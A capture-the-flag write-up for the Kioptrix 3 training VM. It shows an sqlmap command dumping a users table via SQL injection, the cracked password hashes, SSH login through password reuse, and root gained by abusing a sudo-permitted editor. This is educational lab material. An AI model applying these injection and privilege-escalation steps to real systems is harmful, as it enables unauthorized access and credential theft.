Dhruv Ambaliya
- Author Description
- Service Enumeration
- Web Application Investigation
- Non privileged shell
- Local Enumeration
- Privilege Escalation
Author Description
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
Service Enumeration
| Port | Service | Version Detection |
|---|---|---|
|
|
SSH |
OpenSSH 4.7p1 Debian 8ubuntu1.3 (protocol 2.0) |
|
|
HTTP |
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |
Web Application Investigation
Enumeration of the website discovered it was likely vulnerable to an SQL Injection, entering id=' rendered the following MySQL error:
SQLMap was used to successfully dump the databases and crack the hashes:
[root:~]# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+Non privileged shell
Due to password reuse both accounts were able to ssh, dreg had a limited shell.
Local Enumeration
Local enumeration of loneferrets home dir disclosed:
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEOPrivilege Escalation
sudo ht rendered a file explorer, the user loneferret was added to the sudoers group, making privilege escalation trivial.
loneferret@Kioptrix3:~$ sudo -s
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~#